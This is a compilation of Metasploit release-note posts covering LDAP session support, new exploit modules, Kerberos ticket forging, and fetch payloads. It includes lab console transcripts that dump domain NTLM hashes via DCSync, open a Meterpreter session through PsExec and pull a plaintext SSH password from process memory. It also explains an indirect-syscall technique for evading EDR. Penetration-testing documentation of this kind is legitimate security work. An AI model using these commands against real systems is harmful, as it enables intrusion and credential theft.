LDAP Authentication Improvements

This week, in Metasploit v6.4.9, the team has added multiple improvements for LDAP related attacks. Two improvements relating to authentication is the new support for Signing and Channel Binding. Microsoft has been making changes to harden the communications to Domain Controllers. Organizations are incorporating these policies which are making LDAP tools without the necessary features unable to operate. The intention behind these changes are to protect communications with Domain Controllers from relay attacks. There are however plenty of scenarios when users may want to authenticate to a domain controller directly with known credentials to perform a variety of tasks.

The new improvements allow Metasploit users to authenticate via either NTLM or Kerberos to LDAP servers with these hardening settings in place. Signing will be performed opportunistically (LDAP::Signing=auto), however it can be either disabled entirely by setting LDAP::Signing to disabled or required with required. Note that setting it to required will raise exceptions with configurations that are incompatible with signing, e.g. connecting over SSL (LDAPS) or using plaintext / simple authentication. At this time channel binding is automatically enabled and can not be disabled in the same way. When connecting over SSL, and authenticating with either NTLM or Kerberos, the binding information is provided to the server.

For users that are unfamiliar with the semi-recent authentication configuration changes introduced in Metasploit v6.3, LDAP modules have an LDAP::Auth option that can be set to one of auto, ntlm, kerberos, schannel, or plaintext.

LDAP Session

In addition to the new LDAP authentication improvements, Metasploit added the latest session type; LDAP sessions this week. Metasploit v6.4 added new protocol-based sessions that allow modules to be run against persistent connections for a variety of services including SMB, MSSQL and MySQL. Once the feature is enabled by running features set ldap_session_type true, users can open sessions with the auxiliary/scanner/ldap/ldap_login module and CreateSession option. These new sessions allow a users to authenticate once and interact with the connection, running queries or modules such as:

• auxiliary/admin/ldap/rbcd – Role Based Constrained Delegation
• auxiliary/admin/ldap/shadow_credentials – Shadow Credentials
• auxiliary/gather/asrep – Find Users Without Pre-Auth Required (ASREP-roast)
• auxiliary/gather/ldap_esc_vulnerable_cert_finder – Misconfigured Certificate Template Finder
• auxiliary/admin/ldap/ad_cs_cert_template – AD CS Certificate Template Management
• auxiliary/gather/ldap_hashdump – LDAP Information Disclosure
• auxiliary/gather/ldap_query – LDAP Query and Enumeration Module

By interacting with the session, the query command becomes available to run queries interactively. It has a few options allowing the scope, attributes and filter to be set.

LDAP (192.0.2.197) > query -h
Usage: query -f <filter string> -a <attributes>

Run the query against the session.

OPTIONS:

    -a, --attributes      Comma separated list of attributes for the query
    -b, --base-dn         Base dn for the query
    -f, --filter          Filter string for the query (default: (objectclass=*))
    -h, --help            Help menu
    -o, --output-format   Output format: `table`, `csv` or `json` (default: table)
    -s, --scope           Scope for the query: `base`, `single`, `whole` (default: whole)

As an example, basic information about the domain can be queried:

LDAP (192.0.2.197) > query -a ms-DS-MachineAccountQuota,objectSID,name -f '(objectClass=domain)'
DC=labs1collabu0,DC=local
=========================

 Name                       Attributes
 ----                       ----------
 ms-ds-machineaccountquota  10
 name                       labs1collabu0
 objectsid                  S-1-5-21-795503-3050334394-3644400624

New module content (2)

Windows Registry Security Descriptor Utility

Author: Christophe De La Fuente
Type: Auxiliary
Pull request: #19115 contributed by cdelafuente-r7
Path: admin/registry_security_descriptor

Description: This adds a module to read and write the security descriptor of Windows registry keys.

Kemp LoadMaster Local sudo privilege escalation

Authors: Dave Yesland with Rhino Security Labs and bwatters-r7
Type: Exploit
Pull request: #19100 contributed by bwatters-r7
Path: linux/local/progress_kemp_loadmaster_sudo_privesc_2024

Description: This adds a privilege escalation exploit module for LoadMaster that abuses the configuration of the sudo command combined with weak file system permissions. There is no CVE for this vulnerability.

Enhancements and features (2)

• #19058 from dwelch-r7 - This adds an LDAP session type allowing users and modules to interact directly with LDAP servers without uploading a payload.
• #19132 from zeroSteiner - Add channel binding information to Metasploit's NTLM and Kerberos authentication for the LDAP protocol. This enables users to authenticate to domain controllers where the hardened security configuration setting is in place.
• #19172 from cgranleese-r7 - Updates the debug command to export the currently enabled user features.

Bugs fixed (1)

• #19183 from adfoster-r7 - Fix windows platform detection bug when running on a UCRT compiled environment.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.8...6.4.9
• Full diff 6.4.8...6.4.9

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Rancher Modules

This week, Metasploit community member h00die added the second of two modules targeting Rancher instances. These modules each leak sensitive information from vulnerable instances of the application which is intended to manage Kubernetes clusters. These are a great addition to Metasploit’s coverage for testing Kubernetes environments.

PAN-OS RCE

Metasploit also released an exploit for the unauthenticated RCE in PAN-OS that has been receiving a lot of attention recently. This vulnerability is an unauthenticated file creation that can be leveraged to trigger the execution of remote commands. See Rapid7’s analysis on AttackerKB for an in depth explanation of the root cause.

New module content (8)

Rancher Authenticated API Credential Exposure

Authors: Florian Struck, Marco Stuurman, and h00die
Type: Auxiliary
Pull request: #18956 contributed by h00die
Path: gather/rancher_authenticated_api_cred_exposure
AttackerKB reference: CVE-2021-36782

Description: This adds an exploit for CVE-2021-36782, a vulnerability which can be leveraged by an authenticated attacker to leak API credentials from an affected Rancher instance.

Gitlab Version Scanner

Author: Julien (jvoisin) Voisin
Type: Auxiliary
Pull request: #18723 contributed by jvoisin
Path: scanner/http/gitlab_version

Description: A web page exists that can be reached without authentication that contains a hash that can be used to determine the approximate version of gitlab running on the endpoint. This PR enhances our current GitLab fingerprinting capabilities to include the aforementioned technique.

Apache Solr Backup/Restore APIs RCE

Authors: jheysel-r7 and l3yx
Type: Exploit
Pull request: #19046 contributed by jheysel-r7
Path: linux/http/apache_solr_backup_restore
AttackerKB reference: CVE-2023-50386

Description: Adds apache_solr_backup_restore module, taking advantage of a Unrestricted Upload of File with Dangerous Type vulnerability, allowing the user to gain a session in an Apache Solr instance for remote code execution.

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

Authors: remmons-r7 and sfewer-r7
Type: Exploit
Pull request: #19101 contributed by remmons-r7
Path: linux/http/panos_telemetry_cmd_exec
AttackerKB reference: CVE-2024-3400

Description: This adds an exploit module for https://security.paloaltonetworks.com/CVE-2024-3400, affecting PAN-OS GlobalProtect Gateway and GlobalProtect Portal deployments with the default telemetry service enabled.

GitLens Git Local Configuration Exec

Authors: Paul Gerste and h00die
Type: Exploit
Pull request: #18997 contributed by h00die
Path: multi/fileformat/gitlens_local_config_exec
AttackerKB reference: CVE-2023-46944

Description: This adds a FileFormat exploit for VSCode. The VSCode extension GitLens by GitKraken before v.14.0.0 allows an untrusted workspace to execute git commands. A repo may include its own .git folder including a malicious config file to execute arbitrary code.

Code Reviewer

Author: h00die
Type: Exploit
Pull request: #18996 contributed by h00die
Path: multi/fileformat/visual_studio_vsix_exec

Description: This adds a new exploit module that creates a malicious VS / VSCode extension file.

Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability

Authors: h00die-gr3y h00die.gr3y@gmail.com and usd Herolab
Type: Exploit
Pull request: #19005 contributed by h00die-gr3y
Path: multi/http/gambio_unauth_rce_cve_2024_23759
AttackerKB reference: CVE-2024-23759

Description: This adds a module for a Remote Code Execution vulnerability in Gambio Online Webshop version 4.9.2.0 and lower allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request.

FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE

Authors: James Horseman, Spencer McIntyre, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #19082 contributed by jheysel-r7
Path: windows/http/forticlient_ems_fctid_sqli
AttackerKB reference: CVE-2023-48788

Description: Adds windows/http/forticlient_ems_fctid_sqli module that takes advantage of a SQLi injection vulnerability in FortiNet FortiClient EMS.

Enhancements and features (11)

• #17294 from adfoster-r7 - This adds a new EVENT_DEPENDENT value for module reliability metadata.
• #18723 from jvoisin - A web page exists that can be reached without authentication that contains a hash that can be used to determine the approximate version of gitlab running on the endpoint. This PR enhances our current GitLab fingerprinting capabilities to include the aforementioned technique.
• #18914 from dotslashsuperstar - This PR adds functionality so that CVE and URL references will be imported from an OpenVAS XML report by default. DNF-CERT and CERT-BUND references can also be collected by sending additional flags to the db_import command.
• #19054 from zgoldman-r7 - Adds NText column parsing to MSSQL modules.
• #19066 from sjanusz-r7 - Adds automated tests for multiple SMB modules.
• #19078 from dwelch-r7 - Fixes a crash in the modules/auxiliary/gather/ldap_query.rb module when running queries from a file.
• #19080 from cgranleese-r7 - Adds architecture and platform detection for PostgreSQL sessions.
• #19086 from nrathaus - Update Metasploit's RPC to expose module's default_options metadata.
• #19105 from zgoldman-r7 - Updates MSSQL modules to support querying multiple new column types: float, real, money, smallmoney, datetime, smalldatetime, and numeric.
• #19112 from zgoldman-r7 - Adds architecture and platform detection for MSSQL sessions.
• #19122 from h00die - Adds additional reliability metadata to exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.

Bugs fixed (6)

• #19079 from nrathaus - Fixes an issue were the password_spray module option was being ignored.
• #19089 from adfoster-r7 - This PR fixes a bug where a user might get an unexpected NoMethodError running the linux/local/exim4_deliver_message_priv_esc module.
• #19111 from zeroSteiner - This PR fixes a bug where a user can specify an invalid payload architecture for a given exploit target. Previously, it was not possible to tab-complete an invalid payload, but this enforces the architecture limitations with a run-time exception before sending the exploit.
• #19113 from adfoster-r7 - Fixes a regression that caused Metasploit to leak memory, and sometimes crash.
• #19114 from zeroSteiner - This PR fixes several instances where we we pass nil values rather than the types expected, causing crashes and stack traces in LDAP-related modules.
• #19129 from nrathaus - This fixes a bug where the notes command included an example which contained a flag that was not supported.

Documentation added (1)

• #19088 from adfoster-r7 - This PR adds documentation for running and writing Metasploit's unit tests.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.4...6.4.6
• Full diff 6.4.4...6.4.6

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Today, Metasploit is pleased to announce the release of Metasploit Framework 6.4. It has been just over a year since the release of version 6.3 and the team has added many new features and improvements since then.

For news reporters, please reach out to press@rapid7.com.

Kerberos Improvements

Metasploit 6.3 included initial support for Kerberos authentication within Metasploit and was one of the larger features in the release. Since then, Metasploit has continued to make Kerberos-related improvements, adding capabilities that didn’t make it into the 6.3 cut.

• The auxiliary/admin/kerberos/forge_ticket module was updated with:
  • Support for the diamond and sapphire techniques in addition to the original golden and silver techniques.
  • The additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
• We added the post/windows/manage/kerberos_tickets post module, which allows users to dump Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’s klist/dump commands do and operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation.
• The auxiliary/gather/windows_secrets_dump module was updated to support pass-the-ticket authentication when using the DCSync technique (the DOMAIN action). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.

Example of running the gather/windows_secrets_dump module with Kerberos authentication and the DOMAIN action:

msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN
[*] Running module against 192.168.123.133

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Opening Service Control Manager
…
[*] 192.168.123.133:445 - Using cached credential for krbtgt/DEMO.LOCAL@DEMO.LOCAL vagrant@DEMO.LOCAL
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Bound to DRSR
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Guest,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=krbtgt,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=vagrant,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local
# SID's:
Administrator: S-1-5-21-1242350107-3695253863-3717863007-500
…

# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:::
…

# Full pwdump format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
…

# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6
…

[*] 192.168.123.133:445 - Cleaning up...
[*] Auxiliary module execution completed

DNS Configuration

One of the major benefits of using the Metasploit framework is the integrated way to pivot connections over established sessions without needing to set up proxies. This means that Metasploit often handles DNS queries for various services as modules are run. Over the past year, Metasploit has made improvements to how it handles its own DNS queries to ensure they are not leaked unintentionally.

Users can configure how hostnames should be resolved. This is particularly useful in pivoting scenarios to ensure that the requests for a specific domain (or all domains) are resolved using a configured nameserver optionally contacted via an established session. As an example, users can configure Metasploit to ensure that their DNS queries for internal resources are originating from a compromised host and not themselves.

Examples of manipulating the DNS configuration:

dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1
dns add --rule honeypot.lab.lan --index 2 black-hole
dns add-static example2.lab.lan 192.0.2.201
dns add --index 1 --rule * static system 192.0.2.1

Viewing the current configuration:

msf6 > dns print
Default search domain: N/A
Default search list:
  * tor.example.com
  * localdomain
Current cache size:    0

Resolver rule entries
=====================

   #  Rule              Resolver    Comm channel
   -  ----              --------    ------------
   1  *.lab.lan         192.0.2.1   Session 1
   2  honeypot.lab.lan  black-hole  N/A
   3  *
   .    \_              static      N/A
   .    \_              10.4.5.45
   .    \_              10.3.20.98


Static hostnames
================

   Hostname          IPv4 Address  IPv6 Address
   --------          ------------  ------------
   example.lab.lan   192.0.2.200
   example2.lab.lan  192.0.2.201

New session types

Metasploit 6.4 adds support for new PostgreSQL, MSSQL, MySQL and SMB session types. The SQL session types allow interactive queries with a remote database instance while the new SMB session will let you interact with a share, navigate directories, upload, and download files. All of these new session types can also be used with relevant auxiliary modules, meaning you can get a single SMB or SQL session and run multiple modules against the session without needing to reconnect each time.

New SMB Session Type Examples

You can open a new SMB session by setting the CreateSession option:

msf6 > use scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant CreateSession=true

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445   - 192.168.123.133:445 - Success: '.\vagrant:vagrant' Administrator
[!] 192.168.123.133:445   - No active DB -- Credential data will not be saved!
[*] SMB session 2 opened (192.168.123.1:52253 -> 192.168.123.133:445) at 2024-03-19 12:07:15 +0000
[*] 192.168.123.133:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > 

The session will open as a new SMB session type:

msf6 auxiliary(scanner/smb/smb_login) > sessions
Active sessions
===============
  Id  Name  Type  Information                        Connection
  --  ----  ----  -----------                        ----------
  1         smb   SMB vagrant @ 192.168.123.133:445  192.168.123.1:53541 -> 192.168.123.133:445 (192.168.123.133)
msf6 auxiliary(scanner/smb/smb_login) >

Interacting with the session allows for direct file manipulation of the remote host including upload and download support:

msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
[*] Starting interaction with 1…
SMB (192.168.123.133) > ls
[-] No active share selected. Use the shares command to view available shares, and shares -i <id> to interact with one
SMB (192.168.123.133) > shares
Shares
======
    #  Name      Type          comment
    -  ----      ----          -------
    0  ADMIN$    DISK|SPECIAL  Remote Admin
    1  C$        DISK|SPECIAL  Default share
    2  foo       DISK
    3  IPC$      IPC|SPECIAL   Remote IPC
    4  NETLOGON  DISK          Logon server share
    5  SYSVOL    DISK          Logon server share

SMB (192.168.123.133) > shares -i foo
[+] Successfully connected to foo
SMB (192.168.123.136\foo) > ls
Shares
======
    #  Type  Name                 Created                    Accessed                   Written                    Changed                    Size
    -  ----  ----                 -------                    --------                   -------                    -------                    ----
    0  DIR   .                    2023-09-15T18:56:07+01:00  2023-10-10T12:39:26+01:00  2023-10-10T12:39:26+01:00  2023-10-10T12:39:26+01:00
    1  DIR   ..                   2021-05-08T09:06:51+01:00  2024-02-01T13:11:41+00:00  2024-02-01T13:11:41+00:00  2024-02-01T13:11:41+00:00
    2  FILE  passwords.docx       2023-10-10T12:34:57+01:00  2023-10-10T12:38:53+01:00  2023-10-10T12:38:53+01:00  2023-10-10T12:38:53+01:00  1403

The new session type supports using existing modules through the session types such as Metasploit’s secret’s dump module which will still keep the session alive afterwards:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > use auxiliary/gather/windows_secrets_dump
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(gather/windows_secrets_dump) > run session=-1

Or you can run Metasploit’s PsExec support with the SMB session to open a Meterpreter session:

msf6 > use windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > run session=-1
…
[*] Sending stage (176198 bytes) to 10.4.227.91
[*] Meterpreter session 2 opened (10.4.227.91:4444 -> 10.4.227.91:50319) at 2024-03-19 16:41:45 +0000
meterpreter >

Kerberos authentication is also supported:

msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local createsession=true 

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445   - 192.168.123.133:445   - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_903639.bin
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445   - 192.168.123.133:445   - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_231110.bin
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid delegation TGS-Response
[+] 192.168.123.133:445   - 192.168.123.133:445 - Success: 'demo.local\vagrant:vagrant' Administrator
[*] SMB session 3 opened (192.168.123.1:50336 -> 192.168.123.133:445) at 2024-03-19 16:43:01 +0000
[*] 192.168.123.133:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

New SQL Session Types Examples

Metasploit 6.4 has added support for PostgreSQL, MSSQL, MySQL session types. You can open a new SMB session by setting the CreateSession option:

msf6 > use auxiliary/scanner/mssql_login
msf6 auxiliary(scanner/smb/smb_login) > run CreateSession=true RPORT=1433 RHOSTS=192.168.2.242 USERNAME=user PASSWORD=password

Which will create a new SQL session:

[*] 192.168.2.242:1433    - 192.168.2.242:1433 - MSSQL - Starting authentication scanner.
[!] 192.168.2.242:1433    - No active DB -- Credential data will not be saved!
[+] 192.168.2.242:1433    - 192.168.2.242:1433 - Login Successful: WORKSTATION\user:password
[*] MSSQL session 1 opened (192.168.2.1:60963 -> 192.168.2.242:1433) at 2024-03-15 13:41:31 -0500
[*] 192.168.2.242:1433    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Which you can interact with using sessions -i <session id> or sessions -i -1 to interact with the most recently opened session:

msf6 auxiliary(scanner/mssql/mssql_login) > sessions

Active sessions
===============

  Id  Name  Type   Information                     Connection
  --  ----  ----   -----------                     ----------
  1         mssql  MSSQL test @ 192.168.2.242:143  192.168.2.1:60963 -> 192.168.23                               .242:1433 (192.168.2.242)

msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i 1
[*] Starting interaction with 1…
mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
Response
========
    #  NULL
    -  ----
    0  Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
	    Oct 8 2022 05:58:25
	    Copyright (C) 2022 Microsoft Corporation
	    Developer Edition (64-bit) on Windows Server 2022 Stand
       ard 10.0 <X64> (Build 20348: ) (Hypervisor)

The query_interactive command will start an interactive prompt for running multiple multi-line queries:

mssql @ 192.168.2.242:1433 (master) > query_interactive
[*] Starting interactive SQL shell for mssql @ 192.168.2.242:1433 (master)
[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
SQL >> select *
SQL *> from information_schema.tables
SQL *> where table_type = 'BASE TABLE';
[*] Executing query: select * from information_schema.tables where table_type = 'BASE TABLE';
Response
========
    #  TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME             TABLE_TYPE
    -  -------------  ------------  ----------             ----------
    0  master         dbo           spt_fallback_db        BASE TABLE
    1  master         dbo           spt_fallback_dev       BASE TABLE
    2  master         dbo           spt_fallback_usg       BASE TABLE
    4  master         dbo           Users                  BASE TABLE
    5  master         dbo           spt_monitor            BASE TABLE
    6  master         dbo           MSreplication_options  BASE TABLE
SQL >>

Similar to SMB sessions, the new SQL modules can run with multiple auxiliary modules, available modules can be searched for:

msf6 > search session_type:smb session_type:postgres session_type:mssql session_type:mysql

Indirect Syscalls Support for Windows Meterpreter

Indirect system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do this is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Syscalls are a way to run system routines directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with indirect syscalls to the corresponding native APIs. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

The main difficulty is finding the correct syscall number since it is not the same across Windows versions. Also, EDRs usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in a sequential order, starting from the number 0. If we look at how native API functions are stored in memory, the syscall number can be deduced from the position of the related native API function in memory. The technique consists in selecting the system call functions (Zw…) from ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of one given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo's Gate.

Another technique we incorporated is to ensure the call to the syscall instruction is made through ntdll.dll. This behavior is sometimes referred to as making an “indirect syscall”. EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using indirect syscalls. The long-term goal is to make indirect syscalls a standard for any future Windows-based development (payload, exploit, etc.). Users do not need to make any changes in order to run Meterpreter with these new changes.

Discoverability Improvements

The definition of “a module” can be a nebulous thing. In recent years, some modules have begun to include multiple CVEs in a single exploit as part of a chain (e.g., Proxy(Not)Shell), while other CVEs affect multiple products and warrant multiple modules (e.g., Log4Shell). Furthermore, modules that aren’t exploiting a particular vulnerability often have different actions they can take, like forging different types of Kerberos tickets or running different LDAP queries for enumeration. As Metasploit development moves quickly, with new content being released each week, it can be difficult for users to find what they’re looking for.

Metasploit 6.4 has made some improvements to make discoverability easier for users. One of the largest changes is the new Hierarchical Search feature. This will cause Metasploit’s internal search capabilities to match additional fields within modules, including the actions, targets and AKA aliases. As an example, this will cause the auxiliary/admin/kerberos/forge_ticket module to show up when the user searches for forge_golden because it is an action of the module:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  auxiliary/admin/kerberos/forge_ticket                .                normal  No     Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging
   1    \_ action: FORGE_DIAMOND                           .                .       .      Forge a Diamond Ticket
   2    \_ action: FORGE_GOLDEN                            .                .       .      Forge a Golden Ticket
   3    \_ action: FORGE_SAPPHIRE                          .                .       .      Forge a Sapphire Ticket
   4    \_ action: FORGE_SILVER                            .                .       .      Forge a Silver Ticket
   5    \_ AKA: Ticketer                                   .                .       .      .
   6    \_ AKA: Klist                                      .                .       .      .
   7  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

msf6 auxiliary(scanner/mysql/mysql_hashdump) >

Windows Meterpreter Memory Searching

Metasploit 6.4 incorporates a new feature for Windows Meterpreter that allows for searching a process's memory for user-specified needles with support for regular expressions. This can be used to search for and find potentially sensitive data in memory near the needles, similar to Linux's MimiPenguin tool. This can be executed against any process with the same or lower privilege level as the Meterpreter session.

This new API is currently in use by the post/multi/gather/memory_search module, where it can be used to search for plaintext credentials - for instance in some configurations of OpenSSH:

msf6 post(multi/gather/memory_search) > run session=1 regex="publickey,password.*" process_names_glob="ssh*"

[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
        ssh.exe (pid: 2972)

[*] Memory Matches for ssh.exe (pid: 2972)
======================================

 Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                    -------------------  ------------------
 0x0000000A00060DF0  127           "publickey,password......3.......myverysecretpassword....................#.........#..........  0x0000000A00000000   0x0000000000090000
                                   ...........S......................"

[*] Post module execution completed

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

• Full diff 6.3.0...6.4.0

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

Thanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Jack Heysel, Jacquie Harris, Jeffrey Martin, Navya Harika Karaka, Simon Janusz, Zach Goldman, Egor Kalinichev, and Spencer McIntyre.

New Fetch Payload

It has been almost a year since Metasploit released the new fetch payloads and since then, 43 of the 79 exploit modules have had support for fetch payloads. The original payloads supported transferring the second stage over HTTP, HTTPS and FTP. This week, Metasploit has expanded that protocol support to include SMB, allowing payloads to be run using rundll32 which has the added benefit of capturing the NetNTLM hashes of the requestor.

This also streamlines the workflow the user would have previously used by first starting the exploit/windows/smb/smb_delivery module, and then copying the command into another exploit. Now the user can simply select one of the SMB-enabled fetch payloads and Metasploit will manage the service and generate the command.

As an added benefit, since #18680 merged into Metasploit, multiple SMB services can be run simultaneously. This means that multiple SMB-enabled fetch payloads can have their own independent handlers running at the same time.

New module content (2)

Base64 Command Encoder

Author: Spencer McIntyre
Type: Encoder
Pull request: #18807 contributed by zeroSteiner

Description: This adds a new encoder module that leverages base64 encoding to escape bad characters in ARCH_CMD payloads for the Linux and UNIX platforms.

SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager

Authors: Spencer McIntyre, bwatters-r7, and sf stephen_fewer@harmonysecurity.com
Type: Payload (Adapter)
Pull request: #18664 contributed by zeroSteiner

Description: This adds an SMB fetch-payload service and a new payload to use it. The payload invokes rundll32 but handles everything for the user automatically.

This adapter adds the following payloads:

• cmd/windows/smb/x64/custom/bind_ipv6_tcp
• cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/custom/bind_named_pipe
• cmd/windows/smb/x64/custom/bind_tcp
• cmd/windows/smb/x64/custom/bind_tcp_rc4
• cmd/windows/smb/x64/custom/bind_tcp_uuid
• cmd/windows/smb/x64/custom/reverse_http
• cmd/windows/smb/x64/custom/reverse_https
• cmd/windows/smb/x64/custom/reverse_named_pipe
• cmd/windows/smb/x64/custom/reverse_tcp
• cmd/windows/smb/x64/custom/reverse_tcp_rc4
• cmd/windows/smb/x64/custom/reverse_tcp_uuid
• cmd/windows/smb/x64/custom/reverse_winhttp
• cmd/windows/smb/x64/custom/reverse_winhttps
• cmd/windows/smb/x64/encrypted_shell/reverse_tcp
• cmd/windows/smb/x64/encrypted_shell_reverse_tcp
• cmd/windows/smb/x64/exec
• cmd/windows/smb/x64/loadlibrary
• cmd/windows/smb/x64/messagebox
• cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp
• cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid
